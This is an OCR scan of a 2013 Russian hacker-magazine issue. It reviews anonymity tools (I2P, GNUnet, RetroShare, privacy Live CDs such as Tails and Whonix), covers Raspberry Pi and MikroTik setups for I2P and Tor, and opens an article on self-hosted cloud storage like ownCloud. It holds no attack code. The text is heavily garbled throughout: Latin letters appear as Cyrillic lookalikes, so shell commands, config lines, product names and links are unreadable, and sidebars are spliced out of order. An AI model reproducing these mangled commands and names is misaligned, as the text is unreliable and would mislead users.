минут, пока сеть настроится, и можно пользо- 
ваться всеми ее скрытыми сервисами. В данном 
случае мы получили анонимный доступ в сеть [2Р‚ 
то есть ко всем ресурсам в домене .12р. Если захо- 
чется выйти в глобальную сеть, то достаточно про- 
сто прописать в настройках браузера использова- 
ние прокси-сервера 127.0.0.1:4444. Выход из |2Р 
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в глобальную сеть осуществляется через опре- 
деленные шлюзы (называемые ощргоху). Как по- 
нимаешь, рассчитывать на огромную скорость 
в таком случае не приходится. Плюс нет никакой 
гарантии, что на таком шлюзе никто не снифает 
твой трафик. Безопасно ли размещать свой ано- 
нимный ресурс в 12Р-сети? Ну, 100%-й гарантии 
безопасности тут никто дать не может, если ресурс 
будет банально уязвим, то не составит особого 
труда определить его истинное местоположение. 


СМОМЕТ 

А как насчет безопасного и анонимного обме- 
на файлами? Для такой цели можно прибегнуть 
к помощи ОМУпв (6и.1у/ИМпОзи) — фреймворка 
для организации безопасной Р2Р-сети, не тре- 
бующей централизованных или любых других 
«доверенных» сервисов. Основная цель проек- 
та — создание надежной, децентрализованной 
и анонимной системы обмена информацией. Все 
узлы сети работают как маршрутизаторы, шифру- 
ют соединения с другими узлами и поддержива- 
ют постоянный уровень нагрузки на сеть. Как и во 
многих других решениях, узлы, активно участвую- 
щие в работе сети, обслуживаются с более высо- 
ким приоритетом. Для идентификации объектов 
и сервисов используется ЧН|, который выглядит 
как =пипет: //тоди1е/1Аепе1Яег, где тоди1е — 
имя модуля сети, а 14епЕ1Нег — уникальный хеш, 
идентифицирующий сам объект. Интересная 
фича — возможность настроить уровень аноним- 
ности: от нуля (не анонимно) до бесконечности 
(по дефолту стоит единица). Для безопасной 
передачи все файлы шифруются с помощью 
ЕСА$ (Ап Епсодта Тог Сепзогзйр-Вез$ат 
ЗПаипд — шифрование для устойчивого к цен- 
зуре обмена файлами). ОМУпе является рас- 
ширяемым, на его основе можно строить новые 
Р2Р-приложения. Помимо файлообмена (наибо- 
лее популярного сервиса), существуют альтер- 
нативные службы: простейший чат, находящийся 
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Консоль маршрутизатора [2Р 
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Во многих странах, таких как Китай или 
Иран, провайдеры активно борются 
против использования Тог’а, применяя 


ОР! (деер раске{ тзресйоп), фильтрацию 
по ключевым словам, избирательную 
блокировку и другие методы. Для того 
чтобы обойти цензуру, фогргоес{ вы- 
пустил специальную тулзу обзргоху ( 

), которая преобразует трафик 
между клиентом и мостом таким об- 
разом, что он выглядит для провайдера 
абсолютно безобидным. 
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сейчас в полумертвом состоянии, атакже распре- 
деленный ОМ5. Ну и как обычно, за анонимность 
приходится расплачиваться: высокой задержкой, 
низкой скоростью работы и достаточно высоким 
потреблением ресурсов (что характерно для всех 
децентрализованных сетей). Плюс присутствуют 
проблемы обратной совместимости между раз- 
личными версиями фреймворка. 


ВЕЗТАО$ЗНАВЕ 

ВезгоЗпаге (6(.1у/спаРТх) — это открытая кросс- 
платформенная программа для построения де- 
централизованной сети по принципу Е2Е (Ейепа 
То Еиепа), использующая ОРС. Основная фило- 
софия заключается в обмене файлами и обще- 
нии только с доверенными друзьями, а не со всей 
сетью, из-за чего ее часто относят к Ааагкпе. 
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Для установки соединения с другом пользователю 
надо сгенерировать с помощью НегоЗпаге пару 
СОРС-ключей (или выбрать существующую). После 
проверки подлинности и обмена асимметричным 
ключом устанавливается $$Н-соединение, ис- 
пользующее для шифрования Ореп3 Е. Друзья 
друзей могут видеть друг друга (если пользовате- 
ли включили такую возможность), но соединяться 
не могут. Такая вот получается социальная сеть :). 
Но зато можно шарить папки между друзьями. 
В сети существует несколько сервисов для обще- 
ния: приватный чат, почта, форумы (как аноним- 
ные, так и с обычной аутентификацией), голосо- 
вой чат (\МоР-плагин), каналы наподобие 1ВС. 


ВАЗРВЕВВУР! 

Ты можешь удивиться: при чем тут Вазрбегту 
Р!? Мы же говорим про анонимность. А при том, 
что сей маленький девайс поможет этой аноним- 
ности добиться. Его можно использовать в каче- 
стве роутера/клиента, предоставляющего тебе 
доступ к Тог/12Р-сетям или анонимному \УРМ. 
Кроме этого, есть еще один плюс. В децентрали- 
зованных сетях достигнуть приемлемой скорости 
доступа квнутрисетевым ресурсам можно, только 
если постоянно находиться в ней. Например, в 12Р 
доверие других «чесночных роутеров» к такому 
узлу будет больше, соответственно, и скорость 
выше. Держать ради этого постоянно включен- 
ным свой компьютер или заводить отдельный 
сервер нерезонно, а вот потратить на это всего 30 
долларов вроде и не жалко. 

В повседневной жизни можно будет пользо- 
ваться обычным подключением, а когда надо будет 
анонимно выйти в Сеть — просто пускаешь весь 
трафик через мини-девайс и не паришься ни с ка- 
кими настройками. 

Надо сказать, что до недавнего времени 
устанавливать софтину |2Р. написанную на чама, 
на «малинку» смысла не было. Жадной до ресур- 
сов Чама-машине никак не хватало стандартных 
256 Мб оперативы. С выходом ВазрЬегту Р! тоае! 
В, несущего на борту уже 512 Мб, это стало уже 
вполне реально. Так что давай рассмотрим основ- 
ные моменты, связанные с установкой. Допустим, 
мы используем РазрЫап (БИ.у/уз8$5АК). 

Первым делом обновляемся: 


5ио ар*{-веф ирдафе; зидо ар*-вет ‹= 
91$*-ирёгаае 


Затем устанавливаем чуа\ма, но не стандартную 
из пакетов, а специальную версию, заточенную 
под процессоры ААМ, — БЙ.1у/1ЗКПЭТМ (как пока- 
зывает практика, стандартная сожрет всю память). 
Скачиваем и инсталлируем: 


5ио Фаг хх\уф ЭаК-8-еа-697--= 
]11пих-агт-\уЕр-ИЯ*-@3_3и1_2013.таг.57 += 
-С /ч5г/1оса1/)ауа 

ехрог* РАТН=$ФРАТН: /ч5г/1оса1/]ама/Ь1п 


После чего скачиваем и устанавливаем |2Р: 


са ^ 

шка1г“ 12рЬ1п 

са 12рЬ1п 

мрее Ир: //м1ггог.12р2.ае/-= 
12р1п5фа11 0.9.7.}ак 

Зауа -)аг 12р1п$фа11 0.9.7.]аг -сопзо1е 


Чтобы превратить Вазрбеггу в роутер для 12Р, 
надо немного поколдовать с конфигами. Пере- 
ходим в ^/.12р и начинаем редактировать файл 
с11еп{5.сопй?. Там нам надо закомментировать 
строку 


С]-- чпипее-дк 


>. Анонимная 
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ны [аы р 
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с11еп{Арр.0.агё5=7657 ::1,127.0.0.1 «= 
. /мебарр$/ 


и раскомментировать 


с11еп{Арр.0.аг8$5=7657 0.0.0.0 «= 
. /мебарр$/ 


Азатем в файле 12рфиппе1 . сопЯё заменить адреса 
в строках 


иппе1.0.1пегасе=127.0.0.1 
фиппе1.6.1п%егфасе=127.0.0.1 


на 9.0.0.0. После чего можем запустить 12Р- 
роутер, выполнив: 


са -=/12рЬ1п 
. /гипр1а1п.$И 


Также можно добавить в сома следующие 
строки, чтобы софтина автоматически поднима- 
лась при запуске системы или после краша: 


@ * * * * /поте/р1/12рб1п/гипр1а1п. $8 
@гебоо{ /поте/р1/12рб1п/гипр1а1п.$В 


Осталось только организовать удаленный до- 
ступ к девайсу. Оптимальный способ — исполь- 
зовать динамический портфорвардинг через $$Н. 
Для этого надо только установить в настройках [2Р- 
туннель, который бы указывал на 22-й порт на ло- 
кальной машине. 


$ ом: 0.00 08) [Шре0.00 68) |. 


Таким же образом можно превратить Р! в ано- 
нимный \РМ (как это сделать, можно посмотреть 
тут — 0(.у/11Впх8\/) или подключить к Тогу (отлич- 
ный видеомануал по этому поводу: 5й.1у/128 009). 
А можно и придумать свой способ, как использо- 
вать девайс для анонимных путешествий по Сети. 


МКВАОТК 

На самом деле Вазрбегту Р! не единственный 
маленький девайс, на базе которого можно ор- 
ганизовать анонимный доступ в Сеть. Достой- 
ной альтернативой ему будет роутер от лат- 
вийской компании Мгойк (БИЛу/тсуОК), 
которая занимается производством сетевого 
оборудования и софта для него. Такой девайс 
обойдется чуть подороже, но потребует мень- 
ше возни при настройке. В числе продуктов 
компании РощегО$ — операционная система 
на базе Мпих, предназначенная для установ- 
ки на аппаратные маршрутизаторы М!гопк 
ВощегВОААО. Различные варианты платформ 
ВощегВОАНО позволяют решать различные се- 
тевые задачи: от построения простой точки до- 
ступа до мощного маршрутизатора. Несмотря 
на наличие разъема для подключения питания, 
практически все устройства могут питаться 
с помощью РоЕ. Большой плюс — наличие хо- 
рошей документации (БИ.1у/]5МАЕТ), в которой 
очень подробно описано, как можно создать 
зесигйу-роутер на базе РощегВОААПАхх, под- 
ключив его к сети Тог. Останавливаться на этом 
не будем, здесь: 6И.1у/1стхбх0 все очень под- 
робно описано. 
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АДДОНЫ 
ДЛЯ БРАУЗЕРОВ 


Большая часть времени в Сети 
идет не на разговоры по скайпу 
или общение в социальных сетях, 
а на простой серфинг. Но и тут нас 
не оставляют без присмотра. Со- 
циальные сети и прочие сайты пы- 
таются отследить, какие ресурсы 
ты посещаешь, что ищешь в Сети, 
чтобы потом пичкать тебя рекла- 
мой по схожей тематике (стоило 
мне разок посмотреть один ноут- 
бук, как он тут же начал выскаки- 
вать повсюду в рекламе от гугла). 
Это быстро начинает раздражать 
и отвлекать от основного поиска. 
Да и вообще, мы заходим в Сеть 
не для того, чтобы показать кому- 
то, что мы ищем. Так что с этим 
надо как-то бороться. 


АРИАЕРАИЙ ПИРИ. 
ВЕ иЫЙ ВЫ В [9 
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ПОДВОДЯ ИТОГИ 


Это лишь наиболее популярные решения, позволяющие хоть как-то оградить свою частную жизнь 
от любопытных глаз Большого Брата. Возможно, в недалеком будущем появятся новые технологии 
или все мы будем активно пользоваться одной из рассмотренных сегодня. Кто знает... Что бы это 


О!5соппес+ 

Один из лучших плагинов, позволяю- 
щий скрыться от рекламной слежки, 
доступный для браузеров ЕпеТох, 
Спготе, Орега и Затап. На офици- 
альном сайте (61.1у/16616\А//) можно 
посмотреть забавный анимационный 
ролик, демонстрирующий, как не- 
которые сайты следят за пользовате- 
лями и мешают им сосредоточиться 
на поиске. После установки данного 
расширения на тулбаре появит- 

ся кнопка, при клике на которую 
отобразится выпадающее окошко 
(дропдаун), и в нем будет наглядно 
показано, сколько «левых» запросов 
(от гугла, твиттера, фейсбука, анали- 
тических и рекламных сайтов) было 
заблокировано при заходе на данную 
страницу. А также на сколько удалось 
сократить время загрузки страницы 
и сколько сэкономить трафика. 


АЧЬоскРи$ 

Еще одним способом отслежива- 

ния пользователя (а также часто 

и распространения малвари) служит 
реклама. И пусть большинство бан- 
неров вполне безобидны, но согла- 
сись, что куча анимации и выскакива- 


- ль 


"елазаиии 59. 
И ни Ш 
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ющие попапы не только раздражают, 
но и отвлекают внимание от искомой 
информации. Чтобы отключить 
рекламу в Ететох, Орега и Спготе, 
достаточно поставить расширение 
АЧБосК Р!м$ (БИ.Пу/ЛЭМИЕ 9). 


ОомогаскМе 

Альтернативой популярному 
О!15соппес{, также поддержива- 
ющей все популярные браузеры, 
может служить ВоМоЙгаскМе (5(. 
[у/УЧ Ту). Интерфейс у обоих 
расширений очень похож. Правда, 
в отличие от более продвинутого 
конкурента, ВоМоПгаскМе предо- 
ставляет право выбора по блоки- 
ровке того или иного шпионящего 
сайта самому пользователю. Такой 
подход пригодится тем, кто хочет 
оставить все как есть, заблокиро- 
вав лишь некоторых нарушителей. 


Спозегу 

Еще одно расширение, позво- 
ляющее блокировать ресурсы, 
пытающиеся отслеживать твое 
местоположение в Сети. Обладает 
большой базой шпионящих сайтов. 
В отличие от коллег по цеху, под- 


= Схема организации 
анонимного доступа 
винтернет при помощи 
Тоги МгОТК 


< миготк 
ВоитегВОАВО 
ВВ411АВ 


ни было, важно всегда помнить, что никогда ни одно решение неспособно дать 100%-ю гарантию 
защищенности. Поэтому не думай, что ты в полной безопасности, установив Тог, [2Р или что-то 
еще, — за чувство ложной безопасности многие уже поплатились. 2= 


Тог Зибпе{ 
\огВпаде 
10.192.168.0/30 


Мигойк 
Но$ро\ 
10.11.1.1 


МАТ Озег Зибпе!{ 
паВпаде 
10.11.1.0/24 


держивает1Е. К сожалению, плагин 
хоть и работоспособный, но дав- 
ненько не обновлялся. Скачать 
можно на официальном сайте (01. 


|У/РЕК). 


УРМ 

Говоря про приватность и ано- 
нимность в Сети, нельзя обойти 
стороной использование для этих 
целей УРМ. Мы уже рассказывали, 
как замутить свой /УРМ-сервер 

в облаке Атагоп’а (БИ.1у/16Е8пту), 
подробно рассматривали установку 
и тонкую настройку Ореп\РМ (51. 
|УЛАЕНИМ). Всю необходимую 
теорию ты можешь посмотреть 

в этих статьях. Однако хочется еще 
раз напомнить, что \/РМ не панацея. 
Во-первых, возможны ситуации, 
когда трафик может «утечь» мимо 
\/РМ-соединения, во-вторых, в се- 
тях, основанных на протоколе РРТР, 
существует реальная возможность 
расшифровать перехваченные 
данные («Такой небезопасный 
\УРМ», |[акер № 170). Так что не сто- 
ит верить в полную безопасность 
при использовании виртуальных 
частных сетей. 


ниете! 


Тог Ргоху 
10.192.168.2 


пуоху Ргоху 
0.192.168.2 


Мигойк 
Тгапзрагег! Ргоху 
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Среди великого множества дистрибу- 
тивов Мпих существуют проекты, зато- 
ченные на обеспечение защиты личных 
данных, приватности интернет-серфинга 
и безопасности переписки. Некоторые 
из них могут устанавливаться на жесткий 
диск, но в основном они предназначены 
для запуска с Мме СО / Цуе 9ЗВ. Это удоб- 
ы но в тех случаях, когда требуется быстро 

Роман Ярыженко развернуть среду для приватной работы 
готтапю@уапаех.ги на чужом компьютере. Джентльменский 


ТА. $ 


ЫВЕКТЕ Ы МОХ 


Пр: /Лай$.боит.ог аее.5и 
Разработчик: ТаЙ$ 

Лицензия: СМУ СРЕ 

Системные требования: РС с У$В/Б\О, 1 Гб ОЗУ 


Русификация интерфейса: да 


Разработчик: Махит Каттегег 

Лицензия: СМИ СРЕ 

Системные требования: РС с У$В/ОМ, 1 Гб ОЗУ 
Русификация интерфейса: да 


беще основан на Сетоо, точнее, на его 
Нагаепед-версии. Соответственно, защита про- 
тив эксплойтов включена по дефолту. Список ПО: 


Та! расшифровывается как ТПе Атпезс псодпНо 
Це бучет, это потомок шсодпКо Ипих, однако 
в отличие от прародителя он основан на Вефшап. 


Главные возможности версии 0.19: ядро 3.4.7; 
ядро 3.9.1; . 1ХОЕ/Орепрбох; 
СМОМЕ 2; ‚ ТОг; 
Тог/2Р; . виртуальная клавиатура Ногепсе. 


браузер сконфигурирован с 55 по умолча- 


нию, весь трафик идет через Тог, небезопас- 
ные соединения необходимо устанавливать 
в ИпзаЕе Ме Вгомег. 


Также имеется интересная возможность — 
маскировка под \\таом/5 ХР От внимательного 
взгляда она, разумеется, не скроет, но для интер- 
нет-кафе ее вполне достаточно. При завершении 
работы содержимое памяти перезаписывается 
нулями. 


БЕЗОПАСНОСТЬ 9/10 
ФУНКЦИОНАЛЬНОСТЬ 9/10 


ПРОСТОТА ИСПОЛЬЗОВАНИЯ 10/10 


К сожалению, удобный интерфейс к 12Р отсут- 
ствует. Одна из изюминок дистрибутива — СаШе$ 
соттипсайоп, который позволяет анонимно об- 
мениваться сообщениями на манер электронной 
почты. Для этого используется тот же почтовый 
клиент, что и для обычной почты, — Сам/з-Май. 

Так же, как и в Та!$, организована очистка опе- 
ративной памяти. Если быть точным, эта функция 
впервые появилась именно здесь, а Та|$ подхва- 
тил идею и реализовал ее у себя. 


БЕЗОПАСНОСТЬ 10/10 
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ПРОСТОТА ИСПОЛЬЗОВАНИЯ 
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ОБЗОР ЦУЕ СО, ОБЕСПЕЧИВАЮЩИХ 
ШИФРОВАНИЕ ПОЛЬЗОВАТЕЛЬСКОЙ 
ИНФОРМАЦИИ И АНОНИМНОСТЬ 
ПРЕБЫВАНИЯ В СЕТИ 


набор подобных дистрибутивов, как пра- 
вило, включает в себя: 

Тог — без него никуда; 

[2Р — анонимный интернет; 

средства шифрования 1М-переписки. 


Многие из этих дистрибутивов постро- 
ены на основе Нагаепеа Сещоо, поскольку 
он содержит в себе улучшенные средства 
защиты от эксплойтов, такие как Рах, и не- 
требователен к системным ресурсам. 


ТИМ НАТ 


ореп5оиугсе.аус.еди/иптпат 


Разработчик: О’УоцуШе СоПеде 

Лицензия: СМИ РЕ 

Системные требования: РС с У$В/Б\О, 4 Гб ОЗУ 
Русификация интерфейса: нет 


Базовая идея этого, основанного опять же 
на Нагаепея Сетоо дистрибутива заключается 
в использовании везде, где только возможно, 
{трЁ5, поэтому он требователен к памяти. Загру- 
жается с О\/О, но не является Име-дистрибутивом 
в современном понимании — при загрузке он всю 
корневую ФС грузит в память, что занимает ощу- 
тимое время (примерно пять минут), и при этом 
шифрует. Таким образом, хоть ключ физически 
и хранится в той же памяти, его еще надо найти, 
а для этого нужно специальное оборудование. 

Если нужно сохранять данные, для шифрова- 
ния используется |оор-ае$, поскольку после него 
зашифрованные данные не отличить от случайно- 
го шума (нельзя не учитывать, что у МЗА, по слу- 
хам, больше возможностей для криптоанализа). 

Ядро в Пт На{ монолитное, поэтому внедрить 
код в нулевое кольцо сложнее. 
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ПРОСТОТА ИСПОЛЬЗОВАНИЯ 
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ОгеатР!ид — компьютер, 
накотором работает ЕгеедотВох 


Меня зовут Никто 


ЕВЕЕООМВОХ 


Неедотбохюипаайоп.ога 


Разработчик: ЕгеедотВох РоипдаНоп 
Лицензия: СМИ СРЕ 

Системные требования: Р№ид-компьютер 
(например, ВазрБеггу Р!) 

Русификация интерфейса: нет 


Это довольно перспективная разработка. Ее идея 
заключается в создании мини-сервера, который 
можно легко унести в кармане. На этом мини-сер- 
вере будет установлено ПО, позволяющее, к при- 
меру, создать ячеистую сеть, объединяющую 
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несколько таких устройств. По замыслам раз- 
работчиков, это должно позволить создать «сво- 
бодное облако». Впрочем, ЕгеедотВох направлен 
также на обход цензуры в тех странах, где она есть 
или скоро появится. 

Тем не менее не все так радужно. Проект, по- 
хоже, тихо глохнет из-за отсутствия разработчи- 
ков и малого финансирования... 
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ПРОСТОТА ИСПОЛЬЗОВАНИЯ 


ПОМНИ: ДИСТРИБУТИВЫ ЕР$ НЕ ПРЕДНАЗНАЧЕНЫ ДЛЯ АНОНИМНОГО СЕРФИНГА. 
СКОРЕЕ, ОНИ ПОДХОДЯТ ДЛЯ БЕЗОПАСНОГО ОНЛАИН-БАНКИНГА 


МНОМХ 


оигсетогае.пе!1/ргое‹{$/мПопх 


Разработчик: мпотх.огд 

Лицензия: СМИ СРЕ 

Системные требования: РС сустановленным Уиа!Вох, 
2 Гб ОЗУ, 10 Гб дискового пространства 

Русификация интерфейса: можно поставить 
соответствующие пакеты 


Отличие \\ЛПопх от других анонимных дистрибу- 
тивов — разделение его на две части: \ММПопх- 
Сае\мау и \МПопх-\ММогкЗайоп. Первая позволяет 
анонимизировать весь трафик, идущий на второй 
или с него. Это позволяет избежать многих уте- 
чек, таких как утечка реального 1Р через $Куре/ 
Трипадегога/Назп-приложения, по той простой 
причине, что реальный 1Р им недоступен. Под- 
держивается также и торификация \\ММпаом/$ — 
как, впрочем, и любой другой ОС; тем не менее 
для пущей анонимности рекомендуется исполь- 
зовать \ЛПотх-\М/огк$анНоп. 

Основаны обе части на ОеШап, соответствен- 
но, проблем с настройкой возникнуть не должно. 
В качестве рабочего стола используется КПЕ. 
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ПРОСТОТА ИСПОЛЬЗОВАНИЯ 


РЯ 
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ый |. 


ноте ат ЕО 
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и 2 


№0 


ме лроьеавоа В А Ь № Ро Е № =: 10381 М 


ч4ОМОО МУЕ-СО/О\УО 
ЫуЛУр$н9у 


Разработчик: Чопбо$ атЬН 

Лицензия: СМИ СРЕ 

Системные требования: РС с ВУБ/ОЗВ, 1 Гб ОЗУ 
Русификация интерфейса: нет 


Этот Име-дистрибутив создан на основе Бешап 
(удивительно, но на этот раз не Септоо) и Хе. 
Стоит отметить две самые интересные особен- 
ности: 
анонимайзер уопбопут, действующий ана- 
логично Тог. Премиум-аккаунт платный, вы- 
ходных узлов не так уж и много. Единственное 
преимущество платных аккаунтов по сравне- 
нию с Тог — заявленная скорость. 
МхМазег — ПО, позволяющее анонимно пе- 
ресылать етай. Вкратце принцип его действия 
таков: письмо направляется конечному адре- 
сату не напрямую, а через гетайег; возможен 
также их каскад. 


На ме О\УО есть весь необходимый софт, 
включая ИбгеО се, Ситр и прочее. 
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ПРОСТОТА ИСПОЛЬЗОВАНИЯ 


ЫРОЗЕ (ЁР5$) 
зр!.ао4.тИ/розе. Пт 


Разработчик: 9$ Вод 

Лицензия: закрытая 

Системные требования: РС с У$В/О\О, 1 Гб ОЗУ 
Русификация интерфейса: нет 


Этот дистрибутив разработан минобороны 

США для своих нужд. Цель его разработки — соз- 

дать безопасную среду для коммуникаций. Суще- 

ствует три версии данного дистрибутива: 

. [Р$З-РиуЫю включает в себя Епетох с На$й, уауа 
и споддержкой смарт-карт (САС и РМ) для до- 
ступа американских чиновников к закрытым 
правительственным сайтам из дома; 
-Р$-РиБ с Оехе включает ИбгеО се и Адобе 
Веадег для документов с цифровой подписью; 
[Р5$-Аетфе Ассе5$ предназначен для вну- 
треннего использования. Судя по всему, 
включает в себя \/Р№-клиент. 


Эти дистрибутивы не предназначены для ано- 
нимного серфинга. Скорее, они подходят для без- 
опасного онлайн-банкинга. 
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ПРОСТОТА ИСПОЛЬЗОВАНИЯ 


д ХАКЕР 09 /176/ 2013 


Статья 
из рубрики 
$УМ/АСК 


Т>Инмк 


в облак 


ПОДНИМАЕМ СЕРВИС 
ДЛЯ ХРАНЕНИЯ 
И СИНХРОНИЗАЦИИ 
КОНФИДЕНЦИАЛЬНЫХ 
ДАННЫХ 


Сегодня возможности МЕ$, ЗМВ/ЦЕ$, ЕТР уже 

не удовлетворяют требования пользователей, по- 
этому все более популярными становятся онлай- 
новые сервисы вроде Огороох. Они имеют простой 
интерфейс и удобны в работе, но вместе с тем 

не гарантируют приватность размещаемых данных. 
Чтобы обеспечить максимальную безопасность 
информации, мы рекомендуем использовать свой 
собственный облачный сервер. 


Сергей Яремчук 
дппдег@зупаск.ги 


ХАКЕР 09 /176/ 2013 Тайник в облаках 


ОММСтОЦО 

Наверное, самый популярный проект, позволяющий организо- 
вать собственное хранилище файлов для обмена данными меж- 
ду пользователями. Причем по возможностям он давно обогнал 
Огорбох, поскольку кроме шаринга пользователь получает еще 
календарь, закладки, адресную книгу (с группировкой по кате- 
гориям), список дел ТОБО и так далее. Реализовано шифро- 
вание файлов, после активации данной возможности инфор- 
мацию не может просмотреть даже администратор. Возможен 
контроль версий файлов (в качестве бэкенда используется С1, 
при нехватке пространства старые редакции автоматически 
удаляются), установка квот и ограничений на максимальный 
размер файлов. Корзина позволяет восстанавливать файлы 
и каталоги, удаленные через веб-интерфейс. Пользователь 
может просматривать РОЕ- и ООЕ-файлы, рисунки в фотога- 
лерее, прослушивать музыку. Предусмотрено редактирование 
текстовых файлов при помощи онлайн-редактора. Доступна 
синхронизация файлов, календаря и адресной книги с мобиль- 
ным устройством или ПК и с другими системами, поддержи- 
вающими протокол гетое$югаде. Система полнотекстового 
поиска, основанная на движке Араспе 1исепе, позволяет искать 
не только по именам файлов, но и по их содержимому. 

Базовые возможности легко расширить при помощи плаги- 
нов, часть из них предоставляется самим проектом, доступны 
разработки третьих сторон. Большую коллекцию плагинов мож- 
но найти в репозитории (аррз.омипсюи@а.сот). Здесь находим 
модуль, проверяющий сохраняемые файлы на наличие вирусов 
(с помощью СатА\), модуль для организации музыкального 
сервера, позволяющий прослушивать музыкальную коллекцию 
с любого устройства в сети, хранилище подкастов и видеоро- 
ликов с доступом через веб-интерфейс или медиаплеер. Таким 
же образом добавляется поддержка Ореп!0 и 1РАР атакже ра- 
бота с внешними хранилищами Огоррох, ЭммН, ЕТР, ЗЕТР, бооде 
)ос$, 53 и Мер А\. 

Доступ к данным предоставляется как для зарегистри- 
рованных на сервере пользователей омпСоиа (помечаются 
как общие/Зпагеа), так и без регистрации для анонимного по- 
сетителя (в виде прямой ссылки). Реализована возможность 
отправки уведомлений другим пользователям через стандарт- 
ный механизм нотификации КОЕ (Ореп СоЙабоганоп Зегмсез 
АР!, изначально проект развивался под эгидой КПОЕ). 

Для доступа используется веб-браузер или \\Шеб)А\, КОРЕ 
КО-Заме$, при помощи которых можно подключить хранилище 
в виде сетевого диска. Интерфейс системы локализован и орга- 
низован логично и просто, поэтому с его освоением не должно 
возникнуть проблем у пользователя с любым уровнем подго- 
товки. Разработаны клиенты омпСюица БезКюр СНет и Мое 
Сет, позволяющие синхронизировать данные с настольной 
системой под управлением М/паом5, Ипих и ОЗ Х либо мобиль- 
ным устройством Апагоа (доступен в двух версиях — платной 
и бесплатной) или ЮЗ ('РПопелРаа/ЛРоч). Кроме этого, в ин- 
тернете можно найти большое количество расширений и при- 
ложений Арр Зтоге, позволяющих сделать работу с омптСоца 
еше более удобной. Например, для файловых менеджеров 
Барт, Маии$, Нпаег и Ехрогег доступны модули интеграции 
с омпСочца. 


Интерфейс омлС1очца организован логично и удобно 


ДОБАВЛЯЕМ ВТОРОЙ УРОВЕНЬ 
ШИФРОВАНИЯ 


Все публичные облачные хранилища шифруют информацию, но, например, 


в случае с Огорбох или 5КуОпуе администраторы могут ее просмотреть. По- 
этому если мы хотим сохранить конфиденциальность данных, лучшим спо- 
собом будет их предварительное шифрование перед отправкой на сервер. 
Для этого можно использовать любую программу с нужной функцией, вроде 
ТгиеСгурт ( ), но это неудобно. Выручают специализированные 
решения: 

. \Ммо ( ) (ранее Зесгебупс) обеспечивает простой способ 
для шифрования локальной папки перед отправкой на Огоррох. После 
установки программы создается новый каталог, и все, что в него копиру- 
ется, автоматически шифруется (АЕЗ$-256) и синхронизируется с Огорбох. 
Бесплатен для персонального и коммерческого использования. Доступны 
клиенты для М/паом$, О$ Х, ЮЗ и Апагою. 

Вохсгуртог ( ) работает по принципу, схожему с Огорбох, 
Соое Опуе и Мсгозой экуО)пуе, Зидаг5упс и хранилищами, использу- 
ющими \/\/ебрА\, но шифрует файлы при помощи АЕЗ-256. Совместим 
с МИ/пао\м$, ОЗ Х, ЮЗ и Апагою. Версия Егее с базовыми возможностями 
(достаточными для персонального использования) доступна бесплатно. 
СгурЕупс ( ) совместима с Огорбох, 
Сооде Опуе, Зку/имуе и другими. Доступна сборка только под \ММИп4о\м$. 
Распространяется по условиям @МИ СОРИ. 


Несколько серверов омпСюоица могут взаимодействовать 
между собой, обеспечивая автоматическое резервное копи- 
рование и миграцию данных пользователя на другой сервер. 
Продукт быстро развивается, новый релиз выходит регулярно 
каждые три месяца. 

Написан омпСоца на РНР и уауа5спр\, в качестве СУБД 
можно использовать ЗОШе, МУуЗОЕ или РоЗогезо(. Для раз- 
вертывания подойдет стандартный ГАМР- или \ММАМР-сервер, 
а сам процесс достаточно тривиален. 

К сожалению, проект имеет длинную историю взломов — 
в разное время в коде омптСюица исследователи находили 
многочисленные критические уязвимости (выполнение про- 
извольного РНР-кода на сервере, получение полного доступа 
к календарям других пользователей и другие). Поэтому при вы- 
ходе новой версии советуем незамедлительно обновляться. 
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Возможности омпС!оц4 расширяются при помощи плагинов 
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Работа с АдаХр!огегна- 
поминает настольное 
приложение 
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5 Му \Могкорасеь = > Чо еаНоп$ * хакер 


ш- | о сизоютегт 


АЗАХРЕОВЕВ 

АаХргег ( ) — решение, выросшее за пять лет 
из файл-менеджера, используемого для управления файлами 
на веб-сервере, в полноценную платформу уровня предпри- 
ятия для обмена данными между пользователями при помощи 
веб-интерфейса, 105- и Апагоа-клиента или \\еб)А\. Возможно 
простое создание мини-сайта, на котором будут публиковаться 
списки размещенных документов. Доступно превью для боль- 
шинства распространенных форматов (аудио, видео, РОЕ 
офисные документы). В случае изменения каталога или файла 
заинтересованные пользователи получают оповещение. Реа- 
лизован планировщик. Доступ к файлам могут получить как за- 
регистрированные, так и анонимные пользователи. 

Веб-интерфейс локализован (хотя и не полностью), постро- 
ен логично и понятно. Слева собраны все ресурсы (папка, об- 
щие и закладки), вверху панель действий (показываются только 
доступные), справа выводится подробная информация о вы- 
бранном файле. Сами файлы отображаются в окне посередине. 
Вид отображения меняется, ненужные блоки можно убрать. Не- 
которые действия вызываются при помощи контекстного меню. 
В общем и целом работа с АаХр!огег напоминает настольное 
приложение. 

Возможна аутентификация средствами Асйуе Онефогу / 
ГРАР НТТР, СА$, ЕТР. ОТР и другими. Разделение прав основа- 
но на ролях, применяемых к пользователям и группам, админи- 
стрировать сервер могут несколько человек, которым четко за- 
даются права. Администратор имеет возможность мониторить 
деятельность пользователей в режиме реального времени. 

Обеспечивается шифрование в течение сеанса НТТР$ 
и данных на уровне файловой системы при помощи ЕпсЕ5. 
В июне 2013 года профессиональным агентством безопасно- 
сти во Франции ( ) был проведен аудит АаХр/огег, 


в результате которого уязвимостей, специфических для веб- 
приложений, обнаружено не было. 

Доступны плагины (Впаде$), позволяющие интегрировать 
АлаХр!огег в популярные СМ$, базирующиеся на РНР — Огира,, 
\№МогаРгез$ и уоопта. Доступен соответствующий АР!, поэтому 
список легко расширить. Плагин АаХр|огег Тог ЕМейпк ( 

) для Мо2Ша Тпипаегона позволяет автоматически заме- 
нять большие вложения в сообщении сгенерированной ссыл- 
кой на хранилище АаХрогег. 

Модульность позволяет при необходимости нарастить воз- 
можности и собрать систему под конкретные нужды. Например, 
обеспечить доступ к другим источникам данных (файловая си- 
стема, ЕТР ЗЕТР Затра, Атагоп $3, Огорбох, НРСюоча, 1МАР, 
РОР итак далее), проверять файлы антивирусом. Также при по- 
мощи плагинов подключается текстовый и офисный редактор 
(через веб-сервис ГоПпо), реализуется возможность просмотра 
изображений, отображение ЕхН-информации, проигрывание 
аудио- и видеофайлов и многое другое. Поведение некоторых 
модулей можно настраивать более тонко, но для этого конфиги 
придется редактировать вручную. Например, чтобы установить 
разрешенные для просмотра и загрузки типы файлов, следует 
заглянуть в зегуег/ соп1/соп+.ассе$$5.+$.1пс. 

Основные плагины поставляются вместе с архивом 
АаХрогег, остальные доступны по адресу 

. Разработать свой плагин не так уж и сложно, проект 
предоставляет всю необходимую документацию и демонстра- 
ционный плагин, который можно использовать как основу. 

